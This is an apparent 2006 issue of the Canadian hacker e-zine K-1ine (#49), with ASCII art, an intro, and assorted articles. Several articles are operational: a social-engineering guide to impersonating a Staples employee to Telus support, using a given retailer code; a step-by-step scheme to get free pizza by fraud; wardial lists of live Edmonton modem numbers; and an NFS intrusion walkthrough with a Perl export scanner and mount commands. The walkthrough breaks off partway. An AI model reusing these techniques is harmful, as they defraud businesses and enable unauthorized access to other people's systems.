` ;: ff :jj iiLLLLLLLLLLLLLLLLLLL' .LLLLLLii jjii iiLLLLLLi; iiLLLLLL'iLLLLLLLLLLii LL################ii'.KK######' ,,ii.. `KK####LL `KK#### ##########LL LL##############ii',KK########' ,,;;,,tt LL####GG LL#### ####LLLLKKLL LL#### .KK########## ii,,,,ii,, LL###### LL#### ####ii `ii LL#### .KK####KK###### ,,::,,,,:: LL######. LL#### ####ii ' LL#### ,iiKK##KK'`L##### tt::::jj:' LL######i LL#### ####ii LL#### ,iK##iiGG' L##### .,,;,t' LL######j. LL#### ####ii . LL#### ,iK####KK' L##### ..GGDDii LL#######i LL#### ####;;,.iiii LL####.,iK####KK' L##### LL####KK LL########; LL#### ####EE####LL LL##########KK' L##### LL###### LL########L,LL#### ##########LL LL########KK' ,jLi,, L##### LL###### LL####WW##G;LL#### ######LLiiij LL######KK' t######LL, L##### LL###### LL####LL####LL#### ####ii ` LL######WW `LWW##LL; L##### LL###### LL####LL####GG#### ####ii LL########D, "ikij; L##### LL###### LL####LLKK##WW#### ####ii , LL##########k L##### LL###### LL####LL;j######## ####ii ,LL LL####';######, L##### LL###### LL####LL .######## ####ii,,KKLL LL#### "D####DD. L##### LL##49## LL####LL ;####### ####KK####LL LL#### `WW####ii L##### LL###### LL####LL 'D###### ##########fi 'tK## "####KKi L##### LL###### LL####LL i###### ######EE' ';j `L####i . L##### LL###### LL####LL '###### ####i' jWW##i R;, L##### LL###### LL####LL,; ######, G' , ii,, `iK##i ###kK##### LL###### LL####KK## LL###" ff 'DDjj 'Djj ########## LL###### LL######## jL" ;;DD; 'GGDD.. ' ##########i. LL###### ,KK######## jjKK;' 'EEEEii 'i##########i LL###### ,KK########G" ..DDEEt' 'jEEEEtt '"KK######L LL###### ;########f' ;;DDEEDD tEEEEEE; 'ij####L LL###### ;####KD;' ,EEEEEEj; 'EEEEEEEE 'iKKL LL###### ;##fi" ,GEEEEEEf' EEEEEEEE: 'i LL###### ;f" ,EEEEEEEE; EEEEEEEEff, "CYB0RG" iiEEEEEEEE: DDEEEEEEEEff, ,iEEEEEEEEEE' 'fEEEEEEEEEEEEffjj. .... .;;ffEEEEEEEEEEEEDD 'EEEEEEEEEEEEDD;;ffEEEEEEEELL..GGEEEEEEEEEEEE;' 'EEEEEEEEEE..LLEEEEEEEEEEEEGG..GGEEEEEEEEi' .LLEEGG;;GGEEEEGGjjjjffEEEEGG..ffEEDD;; ,;;jjjjjjjjjjffjjDDEEEEtt ;EEEEEEjjjjffjjjjjjjjii. ,,GGEEEEEEEEEEEEEEEEEEEEEEEEf. 6 fDEEEEEEEEEEEEEEEEEEEEEEDD;; ;;EEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,, ,fEEEEEEEEEEEEEEEEEEEEEEEEEEEEjj ;;EEEEEEffjjii..::jjEEEEWWWWKKEEEEjj..EEEEEEKKWWKKEELL;;..;;ttffEEEEEE;; ,EEDDii'' ff######KK##EEGGjjEEEE########EE 'iiGGEE; jjGG'' ii######;; iiWWEEjjEEWW##########jj 'jjLi tt SOLVE ,WW####GG WWEEjjEE##KKWW########;. COAGULA ii ,;######LL 6 KKEEEEEEGG ########jj ;;WW####WW ##EEEEEEEE 6 ######WWjj ::KK######DDttKKWWEEEEEEKKKKWW######EEjj 'EEKK##########EEEEEEEEEEKKWWWWWWKKEE' ;;EEKKWWLLDDEEEEEEEEEEEEEE;;GGEEEEii ttEEEEffiiEEEEEEEEEEEEttjjEEEELL iiEEEE,,EEEEEEEEEEEE..EEEEtt ..DDEEiiGGEEEEEEEEEE::EEEE;; ..DDEEjj EEEEEEEEEEEE;;iiEEEE,, LLGG.. ffEEKKEEEEEEEEjj GGGG. EE,, ttEEWWWWKK##EEjj .DD,, ;;LL jjEEEEEEEELL; jjff ..jj DDjjiiiittLL,. jjtt GG EEEEEEEEEEEE,. jj' . ;;LLEEEEGG;; , ..jjjjjjjj.. GGEEEEEEjj ;DDEEEEDD' ff;;KKEEjj ff'.KKEEtt LL. ; .LLEE:: ,ii;; jjKK. ffEE;; iiKK' `##WWi. iiEEff ,ff##LL ##KK##;. 'GGLL ,;;;jj##LL ##LLLLEE, ';EE. jj## ##LL ##LL''##;. LLj ,LL iiGG ##LL ##LL ##LL ..KK##ii. ';, ..ff##ii ..LL ##LL ##LL WWGG KK##;;DDLLiii,. ,;LGGii#### jjtt ##LL ##LL EEWW ;##LL' `KK::ii####ii iiDDWWLL;;WWi; `LL##, LLK' ##LL ##LL LL## tt##f; LLii `WWKK `DD##tt ,GG' LL##j LLf' ##LL ##LL LL##..LL##i' ;;jj WWKK 'i##GG ti' ii##i KKf ##LL ##LL LL##..GG##; ,, WWKK '####Kj 'i##W; LL; ##LL ##LL LL##;;GG##' WWKK iL##L: 'KK##.;LL' ##LL ##LL LL##..GG##. WWKK ;##Ki LL##ffLf ##LL ##LL GG## 'LL##;. WWKK '####, iL##DDi' ##LL ##LL WW## LL##ii WWKK .. jEE##L, ';##WW; ##LL ##LL ##GG ;;##ff WWKK ff jDf ##KK, '##LL' ##LL ##LL..##jj '##LL tt;; WWKK ,WW ,tLf WW##;, ##Lf ##LL .;##DDEEWWi' LL##;. ,DD' WWKK ;iGG ,DD; LL##LL. DDf' .;##LL. EEKKEEGGi" 'KKWWKKi' ,;jLLLLLLLLjjjjLLLL DDGGGEE;. LL' .;KKKKWWi; 'ii' ;; :. .: ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: ::............................................................................:: :: :: :: 6 6 :: :: BLATH3R :: :: :: :: Intro -:- The Clone :: :: Contact -:- The Clone :: :: Link -:- The Clone :: :: Mirrors -:- The Clone :: :: Nettwerked Radio -:- The Clone :: :: Hack Canada T-Shirts -:- The Clone :: :: :: :: :: :: FL3SH :: :: :: :: The Nine Satanic Statements -:- Anton Szandor LaVey :: :: Toronto 2600 working with "The Man" -:- jimmiejaz :: :: Having Fun With Telus Channel Care -:- Kab0b :: :: Treo 650 Ringtones With Telus -:- h4v3n :: :: 413 & 444 Edmonton Wardial Scans -:- The Clone :: :: Free Pizza from Pizza Pizza -:- Guardian Angel :: :: .mounting for access. -:- war :: :: Seeds, Prohibition and YOU -:- Aftermath :: :: Linux sysctl.conf Sample -:- war :: :: Making source code viruses using MS -:- Two-Twenty :: :: Basics of Steganography -:- aestetix :: :: oh-day CDMA Cellphone Programming -:- Andrew :: :: Carrier Access Codes in Edmonton -:- war :: :: Using Pocket Tunes Deluxe Trial -:- aciddata :: :: Windows Genuine Check Bypass -:- Officer Koharski :: :: The Temporary Autonomous Zone -:- aestetix :: :: The Telephonic Real in 2005-2006 -:- war :: :: The Nine Satanic Sins -:- Anton Szandor LaVey :: :: :: :: :: :: 0M3GA :: :: :: :: Credits -:- The Clone :: :: Shouts -:- The Clone :: :: :: :: 6 :: ::............................................................................:: ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: intro Welcome K-1ine readers to the special "666" (#49) issue. Why is it the "666" issue you ask? Simple: today is the 6th month (June), 6th day, and 6th year of the 21st century. This day, while feared by Christians and other religious groups, has great significance for others... specifically satanists. Now before you go e-mailing me some exceedingly ignorant/annoying hate mail, do me one small favor: actually read up on what Satanism is really all about. Start first by Googling the keyphrases: "Satanism" and "Anton Szandor LaVey". Anyway, enjoy K-1ine issue #49 and sorry about the late in the day delay. Some of us in the "real world" do actually have jobs. Surprise surprise. Enjoy. - The Clone ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: Contact Information: |*> Comments/Questions/Submissions: theclone@hackcanada.com |*> Check out my site: (Nettwerked) http://www.nettwerked.net |*> Check out the Web-forum: http://board.nettwerked.net/ ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: Link of the Wheneverly: Every whenever I post one really great "link of the quarter" on each issue of K-1ine magazine. The link can be anything in the technology industry, music scene, rave scene, punk scene, or even a good article you read on a news site. I'll be taking submissions via e-mail or IRC right away; so get your links in and maybe you'll see it in the next issue of K-1ine! For the Summer 2006 issue of K-1ine, the link of the whenever-we-feel-like- releasing-this-motherfucking-issue is: http://www.churchofsatan.com/ The official Church of Satan website as founded by Anton LaVey. Includes membership information, news, information about its late founding member Anton Szandor LaVey, and much more. A fantastic resource for people who may be interested in what Satanism is truly about. Or for anyone else. Submitted by: The Clone ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: K-1ine Magazine Mirrors: (Updated: 6/6/6) WIRETAPPED "Wiretapped.net is an archive of open source software, informational textfiles and radio/conference broadcasts covering the areas of network and information security, network operations, host integrity, cryptography and privacy, among others. We believe we are now the largest archive of this type of software and information, hosting in excess of 20 gigabytes of information mirrored from around the world." Now mirrored in two places, one in Belgium and another in Sydney. http://www.mirrors.wiretapped.net/security/info/textfiles/k1ine/ HACK CANADA "Hack Canada is the source for Canadian hacking, phreaking, freedom, privacy, and related information." http://www.hackcanada.com/canadian/zines/k_1ine/index.html TEXT FILES "Contains information gathered from BBS's in the early days of the Internet. Includes archives of famous and not-so-famous e-zines, and much much more. The largest text file archive on the Internet." HACK DA PLANET "Home of Cyburnetiks' web-site. Miscellaneous hacking, phreaking, anarchy files, home of the official Anti-Tempest Network Project." http://hackdaplanet.ath.cx/other/k-1ine/ ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: Nettwerked Radio (Undergr0und Radio and Music every 2nd weekend!): Tune into this critically acclaimed radio show every other weekend. Friday or Saturday (or whenever) from: 12:00am - 3:00am (MST). To listen, please tune in to: http://68.151.35.41:8000/listen.pls (Note: this is a dynamic IP address. It may change from time to time, so please visit www.nettwerked.net/radio/ for the latest ip address). If you're not sure whether the show is on, visit nettwerked.net/radio, and look at the Radio section. If you see lime green "ONLINE", then we are live. You can listen in using Winamp, XMMS, or anything that will play Winamp streaming audio. We thank you for your support and hope that you tune in, give your feedback, and make those artist requests! -------------------------------------------------------- Contribute your music to Nettwerked Radio, and be heard: -------------------------------------------------------- Do you have your own band? Are you a solo artist? Do you make your own music on your computer, or with regular instruments? Be heard! Nettwerked Radio, on from 12AM-3AM (MST) every other weekend, is now accepting submissions of YOUR original music for play. We will accept MP3 or OGG formats. If you submit your music, be sure to include information on the band, and any information; such as location, and history. Nettwerked Radio will play your music and advertise your artist information! Nettwerked Radio is a great way to be heard without having to pay out for advertising, or passing out flyers, etc. We respect your copyright too. We will only play your songs when you want them played. We will not duplicate, share or otherwise pirate your songs. All interested artists please send your music and information to: the.clone@gmail.com ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: Hack Canada T-Shirts: It don't mean jack if it ain't got that hack... Hack Canada T-shirts are back. "Demonstrate your indifference to authority and all things conformist by sporting an exclusive Hack Canada T-Shirt. Strike terror and paranoia into the hearts and minds of parents, teachers, telco employees, governments, and law enforcement drones alike. These high-quality, 100% cotton t-shirts feature the universally renowned Hack Canada digital chainsaw in all of its nipple-hardening glory. Damn." Available in: Small, Medium, Large, and XL, these shirts are extremely durable and can fit most. Available in two styles: White on Black or Silver on Black. Get them while they last only at: http://www.hackcanada.com/gear/index.html ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: The Nine Satanic Statements 1 Satan represents indulgence, instead of abstinence! 2 Satan represents vital existence, instead of spiritual pipe dreams! 3 Satan represents undefiled wisdom, instead of hypocritical self-deceit! 4 Satan represents kindness to those who deserve it, instead of love wasted on ingrates! 5 Satan represents vengeance, instead of turning the other cheek! 6 Satan represents responsibility to the responsible, instead of concern for psychic vampires! 7 Satan represents man as just another animal, sometimes better, more often worse than those that walk on all-fours, who, because of his "divine spiritual and intellectual development," has become the most vicious animal of all! 8 Satan represents all of the so-called sins, as they all lead to physical, mental, or emotional gratification! 9 Satan has been the best friend the church has ever had, as he has kept it in business all these years! The Satanic Bible, Anton Szandor LaVey, 1969 ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: Toronto 2600, working with "The Man" to help spread the word of Open Source, and Freedom of Information. So, it was a sunny summer day in (2003?) and Toronto2600 (http://www.to2600.org) was approached by a journalist from the C.B.C. (Canadian Broadcasting Corporation http://www.cbc.ca ) to talk about the "Open Source" movement, hackers, and what the community in general was all about. A date was arranged to meet at "The Lab", and a handful of 2600 members where picked out of the larger group to make sure that there was knowledgeable people who could put forward ideas in a clear manner and not a free-for-all involving the entire group. Those members were, in no particular order, caesium, Grinthock, intruder, Kris, and myself, jimmiejaz. We sat down with "The Man" from C.B.C, ready to inform the masses about Open Source Software, DRM, DeCSS( http://en.wiki pedia.org/wiki/DeCSS ), and other issues facing privacy, freedom to use informat- ion that we legally bought, CDs, DVDs on our own legal systems, running non-Micro soft, and non-restricted media players. The interview lasted a couple of hours, we all had fun, a lot of laughs, parted company and went to the pub to kill the rest of the evening. A few weeks go by, didn't hear anything, a few more, then a few months go by and intruder let's us know that the interviewer had dropped by the lab with a copy of the interview on CD, in .wma format. Dammit! we missed hearing ourselves on "The Man's" radio. Oh well, that's how the cookie gets rejected. We all fire up our players(mplayer,http://www.mplayerhq.hu/ xmms, http://www.xmms. org etc...) and *WOW* Eric Raymond (http://www.catb.org/~esr/) is in the interview. We had no idea he was part of it at the time. But what we weren't surprised about was the entire interview was edited down to a few sound bites. Overall, the inter- view holds up well, even today, well, they do mention Lindows, (now called Linspire, thanks to Microsoft strong arm tactics: http://www.techworld.com/opsys/news/index. cfm?NewsID=1387 ) Well, it was all forgotten about until Kris brought it up out of the blue, and to my suprise, I had what seems to the be only remaining copy in my backups. So, after converting the .wma to .ogg, mplayer OpenSource-CBC.wma -vo null -vc dummy -ao pcm && lame -m s audiodump.wav -o OpenSource-CBC.wma for i in *.wav; do \ SONG=`basename "$i" .wav` \ if [ -e "$i" ]; then \ oggenc -o "$SONG.ogg" "$i" \ fi \ done (a handy script for mass conversion) and a few uploads later, I present, Eric Raymond, Toronto2600 on C.B.C Radio discussing Open Source, hackers and community for your enjoyment. It is in both, .mp3(7.2M) and .ogg(5.2M) http://hyperupload.com/download/0269711967/OpenSource-CBC.ogg.html http://hyperupload.com/download/01d27aae92/OpenSource-CBC.mp3.html If the files are ever removed from those locations, email me at to2600 at gmail dot com and I'll post them for you. If nothing else, I hope this helps others in speaking with the media, and proving that hackers aren't the evil kids always shown in the news. I'd like to say a big Thank You to The Clone, Nettwerked.net, HackCanada.com and lastly to 2600.org for providing outlets to spread Truth, Justice and above all, the Freedom to explore, learn and share knowledge. Jimmie James (a.k.a jimmiejaz) http://www.to2600.org when fr0st gets angry he turns into the incredible sulk. ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: Having Fun With Telus Channel Care. Written By Kab0b *Disclaimer* If you're going use this to commit illegal activities I'm not responsible if you get caught. So don't blame me. What is Telus Channel Care? Telus Channel Care is a Support line for Telus resellers to get support do warr- anty ESN changes as well as probley do anything that has to do with a Telus acc- ount. It is only for use of employees of Telus Resellers (Staples, Best Buy, Future Shop) Required Information. In order for this to work you need to use some social engineering skills. If you get caught doing anything you will most likely get a flagged account. First things first you are going to be a Staples Employee. You can be any store in Alberta since they all use the same retailer code. You will sometimes be asked for a store number so you will need to obtain that. Usually if you go into a store and ask for the store number they will give it to you without a second thought. The number you need to call is 1 888 446 1645. When you call that number you will get to a IVR the menus are like this: "Welcome To Telus Channel Care please be advised we are experiencing longer delays than normal." It always says this and I almost never wait longer than 5 minutes. "Press 1 For Independent and Telus Mobility stores..." "Press 2 For Retailer Inquires..." "In Order to get anything done you will need to press two..." Once you press two it will ask for a retailer code. You will want to enter 06007. This is a code that identifies you as a staples employee. Once you enter your retailer code you will have 3 Options. "Press 1 For Inventory Inquiries..." "Press 2 For Pay and Talk Inquiries..." "Press 3 For PCS Inquiries..." "Press 4 All other Inquiries..." After you make you selection you will get to talk to a Rep. From here you will be able to get most anything done. Easiest thing to do is get ESN Changes at no charge (Save $15). To do an ESN change all you need to tell the Operator is that your name is "X". Make up a name if the account is in your name. They will then ask for the new ESN the 7 digit phone number as well as the pin for the account. They will sometimes ask to talk to customer, what usually works for me is to tell the operator that the customer has left the store and will be back in a bit to pick up the phone and they want it ready when they come back. Usually that will work. The Reps are pretty used to talking to people who have no clue what they are talking about so don't be too worried about asking stupid questions. This will allow you to do pretty much anything to you account. If you aren't sure just ask them they will be able to tell you how to go about getting what you need done. Just remember: don't get caught. I've got some freinds in the HA and a couple of other organizations that owe me favours I can twist my fingers over each other. that's my trick. I have no friends :( ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: ############################################################################### ## ## ## Treo 650 Ringtones With Telus ## ## ## ############################################################################### h4v3n May 10, 2006 www.nettwerked.net www.tastelessthreads.com/~h4v3n Disclaimer ---------- If you are going to be a stupid fuck and actually use this information for attempting criminal activities you'll probably get caught. I am releasing information that I have found, how you use it is your choice, and I am not responsible for your actions. Foreword -------- Well once again Telus is being a pain in my ass. I got my hands on a new PalmOne Treo 650 and I thought all was going to be well. WRONG! Besides losing some features from my Palm Zire like notepad and the ability to change the PalmOS wallpaper Telus rigged the bloody thing so that ringtones can't get installed by hand. Well at least it looked that way. In the following file I will describe what the hell was happening and how to get real MP3 not MIDI ringtones on your Palm Treo for only the WAP charges. Now don't sit back and tell me how basic this is, cause I am not a phone phreak, and a lot of other people aren't either so it's just good info to have on the internets. Details ------- Basically I knew of two ways to get ringtones on a Treo. You could mail them to yourself, or you could beam them with IR or blue tooth. This got the ringtones to your phone but not added into the "sounds" area of the OS. Well a lot of good that did me. When you try to open the ringtone it will ask you if you want to save it in sounds and you tap on OK and then it will give you an error. Ringtones must be 64K or less. HOLY SHIT, you can't make a decent ringtone from an MP3 that small. Well here ya go, how to get that wicked MP3 as your ringtone. First you have to edit the MP3 to be as small as you can make it. So take a 15 second clip out of an MP3, split the left and right channels, and delete the right channel, then change it to Mono. You may also want to increase the volume of this sound clip. This can all be done with a free program called Audacity. You can get this for free at http://audacity.sourceforge.net/ Once you have the mp3 edited use audacity to export the clip as a WAV file. Then email this to your treo. I use Microsoft Active sync with my Treo and I ran into some problems with the corprate email filters. Find your own way around these, or be the admin :) Once your email has been sent sync versa mail with your account and open the email. When you open the email you will see your WAV file attached to the email. Use the directional pad on the Treo to highlight the attachment. Press the middle of the directional pad to select the attachment. Press right on the directional pad and select "Select viewer ..." Once the Treo receives the file over your WAP connection select "sounds". Then select "done". Use the middle of the directional pad to select and download the WAV file. Save it as what you would like and select "OK". Now the Treo will save the WAV file to the device from it's memory. ALL RINGTONES MUST BE SAVED ON THE DEVICE, NOT ON A MEMORY CARD SO KEEP THE RINGTONES SMALL. Now that the WAV file is saved the "MANAGE SOUND" application will open. Select your ringtone to make sure it works. Wahla it works. Have fun with this one, and yet once again I know this isn't very technical but it is kind of cool. ############################################################################### ############################################################################### ## ## ## hh 44 44 vv vv 333333 nnnnn ## ## hh 44 44 vv vv 33 nnnnnn ## ## hhhh 444444 vv vv 333333 nn nn ## ## hhhhh 44 vv vv 333333 nn nn ## ## hh hh 44 vvvv 33 nn nn ## ## hh hh 44 vv 333333 nn nn ## ## ## ############################################################################### ############################################################################### ## ## ## 111 99999 888 44 44 ## ## 1111 99 99 88 88 44 44 ## ## 11 99999 888 444444 ## ## 11 99 888 888 44 ## ## 11 99 88 88 44 ## ## 1111 99 888 44 ## ## ## ## is here ... ignorance is no excuse ## ## ## ############################################################################### ############################################################################### okay we have fx hiding in my cleavage... [due to the discussion] so keep it up * fx/#hackcanada peeks out is it safe? fx - if you get a runny nose there's plenty of tissue in there ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: The Long Lost 780-413-XXXX Edmonton Wardial Scan - * Originally Scanned by: CYB0RG/ASM (Scanned on 01/15/99 - 01/17/99) * Scan Updated and published by: The Clone (last updated on 04/04/06) - Synopsis: CYB0RG/ASM gave me an old school Dell 386 laptop a couple weekends ago. He mentioned to me that he still had some old wardial scans from THC SCAN sitting on the laptop from several years back - January 15, 1999 to be exact (or at least according to the DOS directory listing). In the spirit of bordem and the sheer reminiscence of my younger years, I updated this particular list of Edm- onton Alberta wardials for the 21st century telephone phreaker and/or hacker. This list proves there are still carriers connected to some old server sitting on a machine in a closet, collecting dust. Everyone including the administrators have either forgotten about the dial in numbers, or they simply assume everyone has forgotten about dial ins. They're obviously mistaken. We haven't forgotten. - Note: Only known carriers were listed. Not in service numbers, fax machines, live people, IVR (Interactive Voice Response) systems, and any other non- modem service have been excluded from this list. We only list the good stuff. Carrier: Telus Communications Area Code (NPA): 780 Exchange (NXX): 413 Scanned using: THC-SCAN originally, scanned by hand for updated version 7E1 = 7 bit, even parity, 1 stop bit 7O1 = 7 bit, odd parity, 1 stop bit Modems found: 28 - - 413-0725 - ? (pulse dialing, possible modem) 413-2866 413-3040 - "Enter Login name:" 413-3054 413-3478 - ? (strange modem handshake) 413-5622 413-7167 413-7282 - ? (pulse dialing, possible modem) 413-7701 - GE kV Modem 413-7702 - [AUTODETECTED 7E1 - REPRINTING] 413-7705 - [AUTODETECTED 7E1 - REPRINTING] 413-7716 - [AUTODETECTED 7O1 - REPRINTING] 413-7745 - [AUTODETECTED 7O1 - REPRINTING] 413-7747 - [AUTODETECTED 7O1 - REPRINTING] 413-7749 - [AUTODETECTED 7O1 - REPRINTING] 413-7750 - [AUTODETECTED 7O1 - REPRINTING] 413-7794 413-7795 - [AUTODETECTED 7O1 - REPRINTING] 413-7797 - [AUTODETECTED 7O1 - REPRINTING] 413-7798 413-8466 - "Please enter 1 for system access, or 2 for alarm status" 413-9401 413-9515 413-9519 413-9534 413-9559 413-9572 413-9591 - .eof * phlux/#hackcanada bakes persephone pountang pie troy - yup. ..real pie! ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: The Long Lost 780-444-XXXX Edmonton Wardial Scan - * Originally Scanned by: CYB0RG/ASM (Scanned on 01/15/99 - 01/17/99) * Scan Updated and published by: The Clone (last updated on 06/06/06) - Synopsis: CYB0RG/ASM gave me an old school Dell 386 laptop a couple weekends ago. He mentioned to me that he still had some old wardial scans from THC SCAN sitting on the laptop from several years back - January 15, 1999 to be exact (or at least according to the DOS directory listing). In the spirit of bordem and the sheer reminiscence of my younger years, I updated this particular list of Edm- onton Alberta wardials for the 21st century telephone phreaker and/or hacker. This list proves there are still carriers connected to some old server sitting on a machine in a closet, collecting dust. Everyone including the administrators have either forgotten about the dial in numbers, or they simply assume everyone has forgotten about dial ins. They're obviously mistaken. We haven't forgotten. - Note: Only known carriers were listed. Not in service numbers, fax machines, live people, IVR (Interactive Voice Response) systems, and any other non- modem service have been excluded from this list. We only list the good stuff. Carrier: Telus Communications Area Code (NPA): 780 Exchange (NXX): 444 Scanned using: THC-SCAN originally, scanned by hand for updated version 7E1 = 7 bit, even parity, 1 stop bit 7O1 = 7 bit, odd parity, 1 stop bit Modems found: 28 - - 444-9298 - - .eof I saw the sign it opened up my eyes I saw the sign. In 1995. IN 1995!!!! I remember being 13... in 1995... and these annoying girls at the park were singing it, and my friends and I who were bad asses kept trying to make them shut up. And they wouldn't. So we left. :( ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: Free Pizza from Pizza Pizza By: Guardian Angel Date: 2006-05-09 Mission: Get free pizza Subject: Pizza Pizza Tools needed: A cell phone, the munchies, and about 40 mins to kill. How it's done: Well first decide what you would like to order or if you don't know what you would like to order just consult their menu on the telephone ordering system or online at pizzapizza.ca. Once you have decided on your items you have to choose the store where your order is going to be sent and where you are going to go to pick it up at. The hack has a 100% success rate if you live in a bigger city with many pizza pizza locations but it has worked in small towns too. The key to choosing the locations is to find a street with a few pizza pizza locations on it and the further away from eachother the better. The hack begins... call up pizza pizza (416-967-1111 for Toronto or *1111 on your rogers cell phone) and press 0 for an order taker. Once the person answers s/he will ask you for your telephone # (and sometimes your name but you can use a fake one like joe or something) and if you would like pick up or delivery, you want pick up as this is the only way this hack will work unfortunately. The order taker will then ask which store you would like to pick it up at, to which you would say something like "umm i just moved here so i'm not too sure but i'm by this street in whatever city" and the order taker will look up that street and start listing off locations for you (remember the store you chose eariler for the store the order gets sent to and not the actual location of where you are going to go to pick it up) and when you hear the store you selected say i think that's the one. Be as vague as possible!!! Once you have done that she will ask you what you would like to order, give your order and she will then respond with your total and will tell you the time and that your order will be ready at whatever location in 20 mins or it's free. Now you will wait for 20 mins and go to the location where you want to get your pizza from and tell the staff that you are there to pick your order up, they will ask you for your telephone number and name, give it to them and they will tell you that your order isn't there (obviously because its at the other location you chose to send it to) but don't allude to the fact that you know it isn't. Some stores will be nice and call customer service for you but if they are busy you will have to call yourself by following the steps earlier, but when the order taker comes on ask for customer service and you will get transferred. Once custy service answers they will ask you for your telephone # and what the problem is. Tell them you ordered pizza and it's not at the store you ordered it to. They will apologize to you and see what happened and probably ask you what store you're at, tell them to hold on and ask the people at the store what store you're at and make sure you ask loud enough for the person on the phone to hear. When the store tells what store, you go back on the phone and say "umm the store tells me i'm at such and such a location" the agent will then say "i'm so sorry we will send it there and it will be free of charge", BUT sometimes they will ask you to go to the other location, to which you will ask the store again where that store is and they will be like "thats far man!!" so go back to the phone and be like "um i walked here so no" and they will then send it to the store you're at! Now you have to wait another 20 mins and you will have your free food. If you choose to do this often choose different stores every time cause eventually they will catch on to you and you won't get anything. Good luck and enjoy your pizza! - an original distro via - _0_1_0_1_0_1_0_1_0_1_ WWW.HACKCANADA.COM _ _ _ _ _ _ _ _ _ _ _ l 0 l 0 l 0 l 0 l 0 * phlux/#hackcanada has a girl over is it your social worker ? ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: .mounting for access. There are some computer users and sysadmins out there that do not understand the dangers of mounting a filesystem. Mounting a filesystem from a remote machine that has world read-access can allow you to get write access. Mounting a filesystem is an easy way to share files over a network, and many people disregard that fact. Root access is required to do this, so if you dont have root, go install Linux on your box at home. The simplest way to check if a remote host is able to be mounted is the showmount -e hostname command. If you wanted to check if say, system "mark.icp.net" is able to have their filesystems mounted, you would type the command: showmount -e mark.ipc.net If mark.ipc.net does not have its filesystems mountable, you would get an error message with something along the lines of "RPC failure: can not connect!" or something like that. Its not a big deal if we cant connect to mark.ipc.net, Just try another one. Lets try XXXX.ipc.net: # showmount -e XXXX.ipc.net /var/spool XXXX.ipc.net /var/etc XXXX.ipc.net /home XXXX.ipc.net This one still isnt very useful, the only people that can access these directories are people from inside XXXX.ipc.net. Oh well, try another. ipc.net has many boxes with mountable drives, try another ipc.net address: # showmount -e XXXX.ipc.net /export/home (Everyone) Well, this one is good news. The /home directory is able to be mounted, with access privaleges to all! This one can be pursued further. A simple Perl script that I picked up can be used to very easily search for domains that have the ability to be mounted. Here it is: --------------- start of cmount.pl #!/usr/bin/perl -w # # Check NFS exports of hosts listed in file. # (Hosts are listed, once per line with no additional whitespaces.) # # ii@dormroom.pyro.net - 2/27/97. # Assign null list to @URLs which will be added to later. my(@result) = (); my(@domains) = (); my($program) = "showmount -e "; # Pull off filename from commandline. If it isn't defined, then assign default. my($DomainFilename) = shift; $DomainFilename = "domains" if !defined($DomainFilename); # Do checking on input. die("mountDomains: $DomainFilename is a directory.\n") if (-d $DomainFilename); # Open $DomainFilename. open(DOMAINFILE, $DomainFilename) or die("mountDomains: Cannot open $DomainFilename for input.\n"); while () { chomp($_); print "Now checking: $_"; # Note difference in program output capture from "geturl.pl". open (EXECFILE, "$program $_ |"); @execResult = ; next if (!defined($execResult[0])); if ($execResult[0] =~ /^Export/) { print " - Export list saved."; open (OUTFILE, ">$_.export"); foreach (@execResult) { print OUTFILE; } close (OUTFILE); } close(EXECFILE); print "\n"; } # We are done. Close all files and end the program. close (DOMAINFILE); 0; ------end--------------- Pulled that one out of the Hack Kit. Its a very good file if you are running Linux, sorry, no go for the windows guise. The file will view the domains file, and will do a "showmount -e " for each one of them, and if positive output is received, then it will cat the output to a file. Okay, lets pick a random address from ipc.net (this adderss doesnt exist...) to use. Lets say that we ran a "showmount -e home.ipc.net" and it returned: /home (everyone) That is good enough. The /home directory is mountable by everyone. Okay, you understand how to find a host that allows mountable drives, here is how to mount them. To mount a drive you would type: # mkdir tmp/mount # mount -nt nfs home.ipc.net:/home /tmp/mount # cd / # umount /tmp/mount Thats it. The first line creates a new directory to put the mounted .home in, that directory is /tmp/mount. The second line will mount the home.ipc.net:/home/ directory in /tmp/mount. Now, the mounted filesystem can be cracked, an a user account can be created. Then, the third line moves out of the /tmp/mount/ directory, and the fourth unmounts the filesystem. Now, once you have the filesystem mounted you can do things with it. If you are planning on keeping this host mounted on your box for a long time, you could probably put it in the /mnt/ filesystem, if its convenient. I would usually put a mounted filesystem in the var/tmp/mount directory, but that is just personal preferance. Okay, now a walk-through of a mounted system, and how to go about gaining more privaleges. First thing, we have the mounted drive, lets change to /var/tmp/mnt We will use the fake host "hopme.ipc.net" as the one we are pretending to get into. By the way, this isnt a screen capture or anything. :D First a simple ls -a, see what is in the dir. # ls -a home mail stuff work study games sbin kerberos All the good stuff is probably in the /home directory, so cd to it. # cd home Lets look at the /home directory. # ls -l total 7 drwxr-xr-x 5 boss users 512 Sep 2 05:35 boss 